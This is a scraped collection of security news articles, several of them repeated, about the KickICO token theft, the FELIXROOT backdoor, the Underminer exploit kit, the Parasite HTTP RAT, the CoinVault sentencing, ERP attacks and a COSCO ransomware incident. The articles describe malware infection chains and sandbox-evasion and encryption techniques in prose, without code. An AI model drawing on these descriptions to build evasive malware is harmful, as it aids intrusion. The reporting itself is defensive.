As of Friday, the company announced the situation was under control and the smart contract has been restored. KickICO announced it will return all stolen KICK tokens to their legitimate owners, for this reason, it invited them to connect via email report@kickico.com.

“KICKICO guarantees to return all tokens to KickCoin holders. We apologize for the inconveniences,” Danilevski said.

The company quickly started an investigation on the security breach, the internal staff discovered that the attackers managed to gain access to the private key of the KickICO platform used by the developers to manage the KICK token smart contract.

Once obtained the key, the attackers used it to destroy KICK tokens at approximately 40 addresses and created the same amount of tokens at other 40 wallets he was controlling. Using this trick the overall number of tokens hasn’t changed and security measures in place were not able to detect the fraudulent activity.

“The hackers gained access to the private key of the owner of the KickCoin smart contract. In order to hide the results of their activities, they employed methods used by the KickCoin smart contract in integration with the Bancor network: hackers destroyed tokens at approximately 40 addresses and created tokens at the other 40 addresses in the corresponding amount. In result, the total number of tokens in the network has not changed. ” continues the notification.

Fortunately, the community quickly discovered the security breach and helped the platform to mitigate it. KICKICO quickly responded and prevented further losses by replacing the compromised private key with another one associated with the cold storage.

Read more: https://cryptovest.com/news/kickico-suffered-77m-hack-attack-says-will-return-stolen-kicko-tokens/

“After the incident, the KICK token, listed on the 136th position on Coinmarketcap, has lost 1.87% in the last 24 hours. However, the move may be influenced by the bearish mood of the entire crypto market after the SEC rejected a Bitcoin ETF proposed by the Winklevoss twins.” reported the website cryptovest.com.

Pierluigi Paganini

(Security Affairs – KickICO, hacking)

The post KICKICO security breach – hackers stole over $7.7 million worth of KICK tokens appeared first on Security Affairs.

Security Affairs: FELIXROOT Backdoor is back in a new fresh spam campaign

Security experts from FireEye have spotted a new spam campaign leveraging the FELIXROOT backdoor, a malware used for cyber espionage operation.

The FELIXROOT backdoor was first spotted by FireEye in September 2017, when attackers used it in attacks targeting Ukrainians.

The new spam campaign used weaponized documents claiming to provide information on a seminar on environmental protection efforts.

The documents include code to exploit known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary.

Experts reported that the lure documents used in the last campaign were written in the Russian language. The weaponized document exploits the CVE-2017-0199 flaw to download a second-stage payload that triggers the CVE-2017-11882 vulnerability to drop and execute the final backdoor.

“FireEye recently observed the same FELIXROOT backdoor being distributed as part of a newer campaign. This time, weaponized lure documents claiming to contain seminar information on environmental protection were observed exploiting known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary on the victim’s machine.” reads the analysis published by FireEye.

“After successful exploitation, the dropper component executes and drops the loader component. The loader component is executed via RUNDLL32.EXE. The backdoor component is loaded in memory and has a single exported function,” 

The CVE-2017-0199 allows the attackers to download and execute a Visual Basic script containing PowerShell commands when the victim opens the lure document.

The CVE-2017-11882 is remote code execution vulnerability that allows the attacker to run arbitrary code in the context of the current user.

FELIXROOT backdoor

This backdoor implements a broad a range of features, including the target fingerprinting via Windows Management Instrumentation (WMI) and the Windows registry,  remote shell execution, and data exfiltration.

Upon execution, the backdoor sleeps for 10 minutes, then it checks to see if it was launched by RUNDLL32.exe along with parameter #1.

If the backdoor was launched by RUNDLL32.exe with parameter #1 it makes an initial system triage before connecting to the command-and-control (C2). The malicious code uses Windows API to get the system information (i.e. computer name, username, volume serial number, Windows version, processor architecture and so on).

The FELIXROOT backdoor is able to communicate with its Command and Control server via HTTP and HTTPS POST protocols. The traffic to the C2 is encrypted with AES and converted into Base64.

“FELIXROOT communicates with its C2 via HTTP and HTTPS POST protocols. Data sent over the network is encrypted and arranged in a custom structure. All data is encrypted with AES, converted into Base64, and sent to the C2 server” continues the analysis.

“Strings in the backdoor are encrypt1ed using a custom algorithm that uses XOR with a 4-byte key.”

The experts believe that this backdoor is a dangerous threat but was involved at the time in massive campaigns.

FELIXROOT backdoor contains several commands that allow it to execute specific tasks. Once executed a command, the malicious code will wait for one minute before executing the next one.

“Once all the tasks have been executed completely, the malware breaks the loop, sends the termination buffer back, and clears all the footprints from the targeted machine” continues FireEye.

  1. Deletes the LNK file from the startup directory.
  2. Deletes the registry key HKCU\Software\Classes\Applications\rundll32.exe\shell\open
  3. Deletes the dropper components from the system.

Further details, including the IoCs are reported in the analysis published by FireEye.

Pierluigi Paganini

(Security Affairs – FELIXROOT backdoor, malware)

The post FELIXROOT Backdoor is back in a new fresh spam campaign appeared first on Security Affairs.



Security Affairs

FELIXROOT Backdoor is back in a new fresh spam campaign

Security experts from FireEye have spotted a new spam campaign leveraging the FELIXROOT backdoor, a malware used for cyber espionage operation.

The FELIXROOT backdoor was first spotted by FireEye in September 2017, when attackers used it in attacks targeting Ukrainians.

The new spam campaign used weaponized documents claiming to provide information on a seminar on environmental protection efforts.

The documents include code to exploit known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary.

Experts reported that the lure documents used in the last campaign were written in the Russian language. The weaponized document exploits the CVE-2017-0199 flaw to download a second-stage payload that triggers the CVE-2017-11882 vulnerability to drop and execute the final backdoor.

“FireEye recently observed the same FELIXROOT backdoor being distributed as part of a newer campaign. This time, weaponized lure documents claiming to contain seminar information on environmental protection were observed exploiting known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary on the victim’s machine.” reads the analysis published by FireEye.

“After successful exploitation, the dropper component executes and drops the loader component. The loader component is executed via RUNDLL32.EXE. The backdoor component is loaded in memory and has a single exported function,” 

The CVE-2017-0199 allows the attackers to download and execute a Visual Basic script containing PowerShell commands when the victim opens the lure document.

The CVE-2017-11882 is remote code execution vulnerability that allows the attacker to run arbitrary code in the context of the current user.

FELIXROOT backdoor

This backdoor implements a broad a range of features, including the target fingerprinting via Windows Management Instrumentation (WMI) and the Windows registry,  remote shell execution, and data exfiltration.

Upon execution, the backdoor sleeps for 10 minutes, then it checks to see if it was launched by RUNDLL32.exe along with parameter #1.

If the backdoor was launched by RUNDLL32.exe with parameter #1 it makes an initial system triage before connecting to the command-and-control (C2). The malicious code uses Windows API to get the system information (i.e. computer name, username, volume serial number, Windows version, processor architecture and so on).

The FELIXROOT backdoor is able to communicate with its Command and Control server via HTTP and HTTPS POST protocols. The traffic to the C2 is encrypted with AES and converted into Base64.

“FELIXROOT communicates with its C2 via HTTP and HTTPS POST protocols. Data sent over the network is encrypted and arranged in a custom structure. All data is encrypted with AES, converted into Base64, and sent to the C2 server” continues the analysis.

“Strings in the backdoor are encrypt1ed using a custom algorithm that uses XOR with a 4-byte key.”

The experts believe that this backdoor is a dangerous threat but was involved at the time in massive campaigns.

FELIXROOT backdoor contains several commands that allow it to execute specific tasks. Once executed a command, the malicious code will wait for one minute before executing the next one.

“Once all the tasks have been executed completely, the malware breaks the loop, sends the termination buffer back, and clears all the footprints from the targeted machine” continues FireEye.

  1. Deletes the LNK file from the startup directory.
  2. Deletes the registry key HKCU\Software\Classes\Applications\rundll32.exe\shell\open
  3. Deletes the dropper components from the system.

Further details, including the IoCs are reported in the analysis published by FireEye.

Pierluigi Paganini

(Security Affairs – FELIXROOT backdoor, malware)

The post FELIXROOT Backdoor is back in a new fresh spam campaign appeared first on Security Affairs.

Security Affairs: Underminer Exploit Kit spreading Bootkits and cryptocurrency miners

New Underminer exploit kit delivers a bootkit that infects the system’s boot sectors as well as a cryptocurrency miner dubbed Hidden Mellifera.

Malware researchers from Trend Micro have spotted a new exploit kit, tracked as Underminer exploit kit, delivering a bootkit that infects the system’s boot sectors as well as a cryptocurrency miner dubbed Hidden Mellifera.

“We discovered a new exploit kit we named Underminer that employs capabilities used by other exploit kits to deter researchers from tracking its activity or reverse engineering the payloads.” reads the analysis published by TrendMicro.

“Underminer delivers a bootkit that infects the system’s boot sectors as well as a cryptocurrency-mining malware named Hidden Mellifera.”

Researchers first noticed the Underminer Exploit activity on July 17 while it was distributing the payloads mainly to Asian countries, mostly in Japan (69,75%) and Taiwan (10,52%).

Underminer transfers the malicious payloads via an encrypted transmission control protocol (TCP) tunnel and packages malicious files with a customized format similar to ROM file system format (romfs). According to the experts, this makes it difficult to analyze the malicious code.

The Underminer exploit kit appears to have been created in November 2017 when it only included the code for the exploitation of Flash vulnerabilities and delivered fileless payloads to deliver and execute the malware.

The Underminer EK includes functionalities also employed by other exploit kits, including:

  • browser profiling and filtering;
  • preventing of client revisits;
  • URL randomization;
  • asymmetric encryption of payloads;

The EK redirect visitors to a landing page that profile and detect the user’s Adobe Flash Player version and browser type via user-agent.

In case the visitor’s profile does not match the one associated with a target of interest, the exploit kit will not deliver malicious content and redirect the visitor to a clean website.

The Underminer exploit kit also sets a token to the browser cookie, with this trick if the victim already accessed the landing page, it only delivers an HTTP 404 error message instead of payloads.

Researchers discovered that the Underminer exploit kit still includes a small number of exploits. The experts have spotted the code to trigger the following vulnerabilities:

  • CVE-2015-5119, a use-after-free vulnerability in Adobe Flash Player patched in July 2015.
  • CVE-2016-0189, a memory corruption vulnerability in Internet Explorer (IE) patched in May 2016.
  • CVE-2018-4878, a use-after-free vulnerability in Adobe Flash Player patched in February 2018.

All the above flaws have been exploited by other EKs in the past.

Below the infection flow of Underminer’s exploits described by Trend Micro.Underminer modus operandi

“Like other exploits before it, we expect Underminer to hone their techniques to further obfuscate the ways they deliver their malicious content and exploit more vulnerabilities while deterring security researchers from looking into their activities. And given the nature of their operations, we also expect them to diversify their payloads.” concludes Trend Micro.

Pierluigi Paganini

(Security Affairs – Underminer Exploit Kit, hacking)

The post Underminer Exploit Kit spreading Bootkits and cryptocurrency miners appeared first on Security Affairs.



Security Affairs

Underminer Exploit Kit spreading Bootkits and cryptocurrency miners

New Underminer exploit kit delivers a bootkit that infects the system’s boot sectors as well as a cryptocurrency miner dubbed Hidden Mellifera.

Malware researchers from Trend Micro have spotted a new exploit kit, tracked as Underminer exploit kit, delivering a bootkit that infects the system’s boot sectors as well as a cryptocurrency miner dubbed Hidden Mellifera.

“We discovered a new exploit kit we named Underminer that employs capabilities used by other exploit kits to deter researchers from tracking its activity or reverse engineering the payloads.” reads the analysis published by TrendMicro.

“Underminer delivers a bootkit that infects the system’s boot sectors as well as a cryptocurrency-mining malware named Hidden Mellifera.”

Researchers first noticed the Underminer Exploit activity on July 17 while it was distributing the payloads mainly to Asian countries, mostly in Japan (69,75%) and Taiwan (10,52%).

Underminer transfers the malicious payloads via an encrypted transmission control protocol (TCP) tunnel and packages malicious files with a customized format similar to ROM file system format (romfs). According to the experts, this makes it difficult to analyze the malicious code.

The Underminer exploit kit appears to have been created in November 2017 when it only included the code for the exploitation of Flash vulnerabilities and delivered fileless payloads to deliver and execute the malware.

The Underminer EK includes functionalities also employed by other exploit kits, including:

  • browser profiling and filtering;
  • preventing of client revisits;
  • URL randomization;
  • asymmetric encryption of payloads;

The EK redirect visitors to a landing page that profile and detect the user’s Adobe Flash Player version and browser type via user-agent.

In case the visitor’s profile does not match the one associated with a target of interest, the exploit kit will not deliver malicious content and redirect the visitor to a clean website.

The Underminer exploit kit also sets a token to the browser cookie, with this trick if the victim already accessed the landing page, it only delivers an HTTP 404 error message instead of payloads.

Researchers discovered that the Underminer exploit kit still includes a small number of exploits. The experts have spotted the code to trigger the following vulnerabilities:

  • CVE-2015-5119, a use-after-free vulnerability in Adobe Flash Player patched in July 2015.
  • CVE-2016-0189, a memory corruption vulnerability in Internet Explorer (IE) patched in May 2016.
  • CVE-2018-4878, a use-after-free vulnerability in Adobe Flash Player patched in February 2018.

All the above flaws have been exploited by other EKs in the past.

Below the infection flow of Underminer’s exploits described by Trend Micro.Underminer modus operandi

“Like other exploits before it, we expect Underminer to hone their techniques to further obfuscate the ways they deliver their malicious content and exploit more vulnerabilities while deterring security researchers from looking into their activities. And given the nature of their operations, we also expect them to diversify their payloads.” concludes Trend Micro.

Pierluigi Paganini

(Security Affairs – Underminer Exploit Kit, hacking)

The post Underminer Exploit Kit spreading Bootkits and cryptocurrency miners appeared first on Security Affairs.

Security Affairs: Twitter removed more than 143,000 apps from the messaging service

On Tuesday, Twitter announced it had removed more than 143,000 apps from the messaging service since April in a new crackdown initiative.

Last week, Twitter announced it had removed more than 143,000 apps from the messaging service since April in a new crackdown initiative aimed at “malicious” activity from automated accounts.

The social media giant was restricting the access to its application programming interfaces (APIs) that allows developers to automate the interactions with the platform (i.e. Tweet posting).

Spam and abuse issues are important problems for the platform, every day an impressive number of bots is used to influence the sentiment on specific topics or to spread misinformation or racism content.

“We’re committed to providing access to our platform to developers whose products and services make Twitter a better place,” said Twitter senior product management director Rob Johnson.

“However, recognizing the challenges facing Twitter and the public — from spam and malicious automation to surveillance and invasions of privacy — we’re taking additional steps to ensure that our developer platform works in service of the overall health of conversation on Twitter.”

Twitter says the apps “violated our policies,” although it wouldn’t say how and it did not share details on revoked apps.

“We do not tolerate the use of our APIs to produce spam, manipulate conversations, or invade the privacy of people using Twitter,” he added.

“We’re continuing to invest in building out improved tools and processes to help us stop malicious apps faster and more efficiently.”

Cleaning up Twitter it a hard task, now since Tuesday, Twitter deployed a new application process for developers that intend to use the platform API.

Twitter is going to ask them for details of how they will use the service.

“Beginning today, anyone who wants access to Twitter’s APIs should apply for a developer account using the new developer portal at developer.twitter.com. Once your application has been approved, you’ll be able to create new apps and manage existing apps on developer.twitter.com. Existing apps can also still be managed on apps.twitter.com.”Johnson added.

“We’re committed to supporting all developers who want to build high-quality, policy-compliant experiences using our developer platform and APIs, while reducing the impact of bad actors on our service,” 

Twitter messaging service

Anyway, there are many legitimate applications that used Twitter APIs to automate several processes, including emergency alerts.

Twitter also announced the introduction of new default app-level rate limits for common POST endpoints to fight the spamming through the platform.

“Alongside changes to the developer account application process, we’re introducing new default app-level rate limits for common POST endpoints, as well as a new process for developers to obtain high volume posting privileges. These changes will help cut down on the ability of bad actors to create spam on Twitter via our APIs, while continuing to provide the opportunity to build and grow an app or business to meaningful scale.” concludes Twitter.

Pierluigi Paganini

(Security Affairs – Twitter, messaging service)

The post Twitter removed more than 143,000 apps from the messaging service appeared first on Security Affairs.



Security Affairs

Twitter removed more than 143,000 apps from the messaging service

On Tuesday, Twitter announced it had removed more than 143,000 apps from the messaging service since April in a new crackdown initiative.

Last week, Twitter announced it had removed more than 143,000 apps from the messaging service since April in a new crackdown initiative aimed at “malicious” activity from automated accounts.

The social media giant was restricting the access to its application programming interfaces (APIs) that allows developers to automate the interactions with the platform (i.e. Tweet posting).

Spam and abuse issues are important problems for the platform, every day an impressive number of bots is used to influence the sentiment on specific topics or to spread misinformation or racism content.

“We’re committed to providing access to our platform to developers whose products and services make Twitter a better place,” said Twitter senior product management director Rob Johnson.

“However, recognizing the challenges facing Twitter and the public — from spam and malicious automation to surveillance and invasions of privacy — we’re taking additional steps to ensure that our developer platform works in service of the overall health of conversation on Twitter.”

Twitter says the apps “violated our policies,” although it wouldn’t say how and it did not share details on revoked apps.

“We do not tolerate the use of our APIs to produce spam, manipulate conversations, or invade the privacy of people using Twitter,” he added.

“We’re continuing to invest in building out improved tools and processes to help us stop malicious apps faster and more efficiently.”

Cleaning up Twitter it a hard task, now since Tuesday, Twitter deployed a new application process for developers that intend to use the platform API.

Twitter is going to ask them for details of how they will use the service.

“Beginning today, anyone who wants access to Twitter’s APIs should apply for a developer account using the new developer portal at developer.twitter.com. Once your application has been approved, you’ll be able to create new apps and manage existing apps on developer.twitter.com. Existing apps can also still be managed on apps.twitter.com.”Johnson added.

“We’re committed to supporting all developers who want to build high-quality, policy-compliant experiences using our developer platform and APIs, while reducing the impact of bad actors on our service,” 

Twitter messaging service

Anyway, there are many legitimate applications that used Twitter APIs to automate several processes, including emergency alerts.

Twitter also announced the introduction of new default app-level rate limits for common POST endpoints to fight the spamming through the platform.

“Alongside changes to the developer account application process, we’re introducing new default app-level rate limits for common POST endpoints, as well as a new process for developers to obtain high volume posting privileges. These changes will help cut down on the ability of bad actors to create spam on Twitter via our APIs, while continuing to provide the opportunity to build and grow an app or business to meaningful scale.” concludes Twitter.

Pierluigi Paganini

(Security Affairs – Twitter, messaging service)

The post Twitter removed more than 143,000 apps from the messaging service appeared first on Security Affairs.

ICO hacked: Hackers steal $8 million from KICKICO Blockchain network

By Waqas

Another day, another ICO hacked. This time, KICKICO, an Initial Coin Offering (ICO) project that lets users conduct ICOs, pre-ICOs, crowdfunding and crowdinvesting campaigns have suffered a security breach and as a result, hackers have stolen more than 70 million KickCoins which is around $7.7 million. The cyber attack took place on Thursday, July 26th when hackers breached […]

This is a post from HackRead.com Read the original post: ICO hacked: Hackers steal $8 million from KICKICO Blockchain network

364 inmates hacked prison tablets to steal almost $225,000

By Waqas

Hundreds of inmates hacked the system and transferred almost $225,000 in their accounts. Inmates at Idaho Department of Correction are provided with computer tablets manufactured by a Florida based company JPay. These tablets are powered by communications and data services from CenturyLink, a telecommunications company, headquartered in Louisiana. The purpose of these tablets is to let inmates play games, buy music and […]

This is a post from HackRead.com Read the original post: 364 inmates hacked prison tablets to steal almost $225,000

Security Affairs: Parasite HTTP RAT implements a broad range of protections and evasion mechanims

Researchers from Proofpoint have discovered a new remote access Trojan (RAT) named Parasite HTTP that implements a broad range of evasion techniques.

The Parasite HTTP RAT has a modular architecture that allows authors to easily add new features. The malware includes sandbox detection, anti-debugging, anti-emulation, and other defense mechanisms.

“Proofpoint researchers recently discovered a new remote access Trojan (RAT) available for sale on underground markets. The RAT, dubbed Parasite HTTP, is especially notable for the extensive array of techniques it incorporates for sandbox detection, anti-debugging, anti-emulation, and other protections.” reads the analysis published by Proofpoint.

“The malware is also modular in nature, allowing actors to add new capabilities as they become available or download additional modules post infection.”

The Parasite HTTP RAT leverages string obfuscation and a sleep routine to delay execution and check for sandboxes or emulate environments. It first checks if an exception handler has run, then it checks whether between 900ms and two seconds elapsed in response to the routine’s 1-second sleep split into 10ms increments.

“Parasite HTTP contains an impressive collection of obfuscation and sandbox- and research environment-evasion techniques,” states Proofpoint

In presence of a sandbox, the RAT halts the execution and attempts to make hard the forensic investigations.

“When Parasite HTTP actually does detect a sandbox, it attempts to hide this fact from any observers. It does not simply exit or throw an error, instead making it difficult for researchers to determine  why the malware did not run properly and crashed. ” continues the analysis.

Experts observed the malware using code from a public repository for sandbox detection.

The Parasite HTTP RAT is being advertised on an underground forum. Researchers already spotted the threat in attacks in the wild.

The malware was involved in a small email campaign targeting organizations primarily in the information technology, healthcare, and retail industries.

The phishing emails used weaponized Microsoft Word attachments with macros that act as a downloader for the RAT

The Parasite HTTP RAT is written in C programming language. The author claims it has a small size (49kb) and has he no dependencies.

It also implements plugin support and dynamic API calls support.

Communication with the command and control (C&C) is encrypted, the author also offers a series of plugins for the malware, including User management, Browser password recovery, FTP password recovery, IM password recovery, Email password recovery, Windows license keys recovery, Hidden VNC, and Reverse Socks5 proxy.

It is interesting to note that the malware involves a rare process injection technique. On Windows 7 and newer versions, the malware resolves critical APIs to create registry entries.

The experts highlighted that the Parasite HTTP RAT  includes an obfuscated check for debugger breakpoints it also removes hooks on a series of DLLs to complicate the work of malware experts while investigating the threat.

“Threat actors and malware authors continuously innovate in their efforts to evade defenses and improve infection rates. Parasite HTTP provides numerous examples of state-of-the-art techniques used to avoid detection in sandboxes and via automated anti-malware systems. For consumers, organizations, and defenders, this represents the latest escalation in an ongoing malware arms race that extends even to commodity malware,” Proofpoint concludes.

Pierluigi Paganini

(Security Affairs – Parasite HTTP RAT, malware)

The post Parasite HTTP RAT implements a broad range of protections and evasion mechanims appeared first on Security Affairs.



Security Affairs

Parasite HTTP RAT implements a broad range of protections and evasion mechanims

Researchers from Proofpoint have discovered a new remote access Trojan (RAT) named Parasite HTTP that implements a broad range of evasion techniques.

The Parasite HTTP RAT has a modular architecture that allows authors to easily add new features. The malware includes sandbox detection, anti-debugging, anti-emulation, and other defense mechanisms.

“Proofpoint researchers recently discovered a new remote access Trojan (RAT) available for sale on underground markets. The RAT, dubbed Parasite HTTP, is especially notable for the extensive array of techniques it incorporates for sandbox detection, anti-debugging, anti-emulation, and other protections.” reads the analysis published by Proofpoint.

“The malware is also modular in nature, allowing actors to add new capabilities as they become available or download additional modules post infection.”

The Parasite HTTP RAT leverages string obfuscation and a sleep routine to delay execution and check for sandboxes or emulate environments. It first checks if an exception handler has run, then it checks whether between 900ms and two seconds elapsed in response to the routine’s 1-second sleep split into 10ms increments.

“Parasite HTTP contains an impressive collection of obfuscation and sandbox- and research environment-evasion techniques,” states Proofpoint

In presence of a sandbox, the RAT halts the execution and attempts to make hard the forensic investigations.

“When Parasite HTTP actually does detect a sandbox, it attempts to hide this fact from any observers. It does not simply exit or throw an error, instead making it difficult for researchers to determine  why the malware did not run properly and crashed. ” continues the analysis.

Experts observed the malware using code from a public repository for sandbox detection.

The Parasite HTTP RAT is being advertised on an underground forum. Researchers already spotted the threat in attacks in the wild.

The malware was involved in a small email campaign targeting organizations primarily in the information technology, healthcare, and retail industries.

The phishing emails used weaponized Microsoft Word attachments with macros that act as a downloader for the RAT

The Parasite HTTP RAT is written in C programming language. The author claims it has a small size (49kb) and has he no dependencies.

It also implements plugin support and dynamic API calls support.

Communication with the command and control (C&C) is encrypted, the author also offers a series of plugins for the malware, including User management, Browser password recovery, FTP password recovery, IM password recovery, Email password recovery, Windows license keys recovery, Hidden VNC, and Reverse Socks5 proxy.

It is interesting to note that the malware involves a rare process injection technique. On Windows 7 and newer versions, the malware resolves critical APIs to create registry entries.

The experts highlighted that the Parasite HTTP RAT  includes an obfuscated check for debugger breakpoints it also removes hooks on a series of DLLs to complicate the work of malware experts while investigating the threat.

“Threat actors and malware authors continuously innovate in their efforts to evade defenses and improve infection rates. Parasite HTTP provides numerous examples of state-of-the-art techniques used to avoid detection in sandboxes and via automated anti-malware systems. For consumers, organizations, and defenders, this represents the latest escalation in an ongoing malware arms race that extends even to commodity malware,” Proofpoint concludes.

Pierluigi Paganini

(Security Affairs – Parasite HTTP RAT, malware)

The post Parasite HTTP RAT implements a broad range of protections and evasion mechanims appeared first on Security Affairs.

Security Affairs: Dutch brothers sentenced to community service for involvement in CoinVault ransomware distribution

On Thursday, two Dutch brothers were sentenced to 240 hours of community service for creating and using the CoinVault ransomware.

In 2015, Melvin (25) and Dennis van den B. (21), were arrested from a district court in Rotterdam for their alleged involvement in CoinVault ransomware creation and distribution.

On Thursday, the Dutch men were sentenced to 240 hours of community service for creating and using the CoinVault ransomware.

The men were accused of breaking into computers, make other people’s work inaccessible, and extortion of 1295 people.

“The court today sentenced two men to hack computers and then extort a large group of people. The suspects were 22 and 18 years old at the time. The court finds that there are very serious facts and that a substantial prison sentence is in place.” reads the Rechtspraak.

“The reasons for not imposing an unconditional prison sentence are the fact that they have cooperated fully in the police investigation and in limiting the (digital) damage, their blank criminal record and that they have not committed any new criminal offenses in the past three years. “

CoinVault ransomware was first spotted in the wild in May 2014, it infected more than 14,000 Windows computers worldwide, most of them in the Netherlands, the US, the UK, Germany, and France.

In 2015, after the arrest of the suspects, the authorities seized the command and control server. Kaspersky researchers released a decryption tool for the ransomware allowing victims to decrypt their files for free.

CoinVault ransomware
The two suspects are Duch brothers and were identified with the help of experts from Kaspersky Labs due to bad opsec. The experts from Kaspersky reverse-engineered the malicious code created by the duo and discovered the full name of one of the suspects and their IP address on the command and control server.

“Another thing that we as Kaspersky Lab kept from the public, is that in our initial blogpost about Coinvault we had a screenshot with one of the suspect’s first name in the pdb path.reported Kaspersky.

The two men, that have a clean criminal record, avoided the jail by collaborating in the investigation conducted by the authorities. The course sentenced them with 240 hours of community service, that corresponds to the maximum term of community service condemned people can serve.

The court has also ordered the Dutch brothers to pay compensation to some of their victims.

In order to protect your computer from malware:

  • Ensure your system software and antivirus definitions are up-to-date.
  • Avoid visiting suspicious websites.
  • Regularly backup your important files to a separate drive or storage that are only temporarily connected.
  • Be on high alert for pop-ups, spam, and unexpected email attachments.

Pierluigi Paganini

(Security Affairs –   CoinVault Ransomware, cybercrime)

The post Dutch brothers sentenced to community service for involvement in CoinVault ransomware distribution appeared first on Security Affairs.



Security Affairs

Dutch brothers sentenced to community service for involvement in CoinVault ransomware distribution

On Thursday, two Dutch brothers were sentenced to 240 hours of community service for creating and using the CoinVault ransomware.

In 2015, Melvin (25) and Dennis van den B. (21), were arrested from a district court in Rotterdam for their alleged involvement in CoinVault ransomware creation and distribution.

On Thursday, the Dutch men were sentenced to 240 hours of community service for creating and using the CoinVault ransomware.

The men were accused of breaking into computers, make other people’s work inaccessible, and extortion of 1295 people.

“The court today sentenced two men to hack computers and then extort a large group of people. The suspects were 22 and 18 years old at the time. The court finds that there are very serious facts and that a substantial prison sentence is in place.” reads the Rechtspraak.

“The reasons for not imposing an unconditional prison sentence are the fact that they have cooperated fully in the police investigation and in limiting the (digital) damage, their blank criminal record and that they have not committed any new criminal offenses in the past three years. “

CoinVault ransomware was first spotted in the wild in May 2014, it infected more than 14,000 Windows computers worldwide, most of them in the Netherlands, the US, the UK, Germany, and France.

In 2015, after the arrest of the suspects, the authorities seized the command and control server. Kaspersky researchers released a decryption tool for the ransomware allowing victims to decrypt their files for free.

CoinVault ransomware
The two suspects are Duch brothers and were identified with the help of experts from Kaspersky Labs due to bad opsec. The experts from Kaspersky reverse-engineered the malicious code created by the duo and discovered the full name of one of the suspects and their IP address on the command and control server.

“Another thing that we as Kaspersky Lab kept from the public, is that in our initial blogpost about Coinvault we had a screenshot with one of the suspect’s first name in the pdb path.reported Kaspersky.

The two men, that have a clean criminal record, avoided the jail by collaborating in the investigation conducted by the authorities. The course sentenced them with 240 hours of community service, that corresponds to the maximum term of community service condemned people can serve.

The court has also ordered the Dutch brothers to pay compensation to some of their victims.

In order to protect your computer from malware:

  • Ensure your system software and antivirus definitions are up-to-date.
  • Avoid visiting suspicious websites.
  • Regularly backup your important files to a separate drive or storage that are only temporarily connected.
  • Be on high alert for pop-ups, spam, and unexpected email attachments.

Pierluigi Paganini

(Security Affairs –   CoinVault Ransomware, cybercrime)

The post Dutch brothers sentenced to community service for involvement in CoinVault ransomware distribution appeared first on Security Affairs.

US-CERT warns of ongoing cyber attacks aimed at ERP applications

US-CERT warns of cyber attacks on ERP applications, including Oracle and SAP, and refers an interesting report published by Digital Shadows and Onapsis.

US-CERT warns of cyber attacks on Enterprise resource planning (ERP) solutions such as Oracle and SAP, both nation-state actors and cybercrime syndicates are carrying out hacking campaign against these systems.

The report published by the US-CERT reference analysis conducted by Digital Shadows and Onapsis, titled “ERP Applications Under Fire.

“Digital Shadows Ltd. and Onapsis Inc. have released a report describing an increase in the exploitation of vulnerabilities in Enterprise Resource Planning (ERP) applications. ERP applications help organizations manage critical business processes—such as product lifecycle management, customer relationship management, and supply chain management.” reads the US-CERT bulletin.

“An attacker can exploit these vulnerabilities to obtain access to sensitive information.”

Unfortunately, there is an impressive number of systems exposed online without necessary security measures, it is quite easy for attackers to find online exploits that could be used to hack them.

“The findings shed light into how nation-state actors, cybercriminals and hacktivist groups are actively attacking these applications and what organizations should
do to mitigate this critical risk.” states the report.

“We observed detailed information on SAP hacking being exchanged at a major Russian-speaking criminal forum, as well as individuals interested in acquiring SAP HANA-specific exploits on the dark web. This goes in hand with an observed 100% increase of public exploits for SAP and Oracle ERP applications over the last three years, and a 160% increase in the activity and interest in ERP-specific vulnerabilities from 2016 to 2017.”

Below the key findings of the report:

Hacktivist groups are actively attacking ERP applications to disrupt critical business operations and penetrate target organizations.

The experts uncovered at least nine operations carried out by hacktivist groups that targeted ERP applications, including SAP and Oracle ERP. The attackers aimed at sabotaging of the applications and compromising business-critical applications.

Cybercriminals have evolved malware to target internal, “behind-the-firewall” ERP applications.

Malware authors have improved their code to target ERP applications to steal SAP user credentials and use them in cyber espionage campaigns.

Nation-state sponsored actors have targeted ERP applications for cyber espionage and sabotage.

Experts collected captured evidence of cyberattacks attributed to nation-state actors.

There has been a dramatic increase in the interest in exploits for SAP
applications, including SAP HANA, in dark web and cybercriminal forums.

Experts observed a spike in the interest in exploits for SAP applications in the Dark Web.

Attacks vectors are evolving, still mainly leveraging known ERP vulnerabilities vs. zero-days.

Threat actors leverage continues to prefer well-known vulnerabilities instead of using zero-day exploits for their attacks.

Cloud, mobile and digital transformations are rapidly expanding the ERP attack surface, and threat actors are taking advantage.

Researchers have identified more than 17,000 SAP and Oracle ERP applications exposed on the internet, most of them operated by world’s largest commercial and government organizations.

ERP applications security report

“Many of these exposed systems run vulnerable versions and unprotected ERP components, which introduce a critical level of risk.” states the report.

Leaked information by third parties and employees can expose internal ERP applications.
Researchers discovered over 500 SAP configuration files on insecure file repositories exposed online, as well as employees sharing ERP login credentials in public forums. Such kind of information is a precious gift for hackers.

Experts recommend organizations to carefully review configurations for known vulnerabilities, change default passwords and enforce strong passwords for users.

Pierluigi Paganini

(Security Affairs – ERP applications, hacking)

The post US-CERT warns of ongoing cyber attacks aimed at ERP applications appeared first on Security Affairs.

The New Age of Accountability

The EU has been busy in the cybersecurity department, and for good reason. Given Europe’s ever-rising cybercrime rates, a new approach to data protection was in order. This cued the

The post The New Age of Accountability appeared first on The Cyber Security Place.

Ransomware attack disrupted some systems of the shipping giant COSCO in the US

The Chinese shipping giant COSCO was reportedly hit by a ransomware based attack, the attack occurred in the American region.

According to COSCO a “local network breakdown” disrupted some systems in the United States.

Media confirmed the incident was the result of a ransomware attack and quoted a company spokesman as the source.

“The China Ocean Shipping Co. Terminal at the Port of Long Beach was hit by a cyberattack on Tuesday, July 24.” states local media.

“A spokesman for the Shanghai-based company, which acknowledged the ransomware attack Tuesday, said that the company’s operations outside the United States were not affected.”

cosco ransomware

The shipping company quickly isolates the systems to avoid propagation to other regions and started an internal investigation, the firm confirmed that the incident did not affect operations of the fleet.

“Due to local network breakdown within our America regions, local email and network telephone cannot work properly at the moment. For safety precautions, we have shut down the connections with other regions for further investigations.” reads the security advisory published by COSCO.

